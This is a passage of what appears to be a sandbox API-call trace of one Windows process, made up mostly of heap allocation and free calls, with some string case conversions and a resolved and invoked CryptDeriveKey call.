0x24b2ba8 [0206.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0206.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.805] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0206.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.806] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.806] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.807] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.807] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0206.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x24a9c48 [0206.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9c48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0206.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.813] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0206.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.814] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 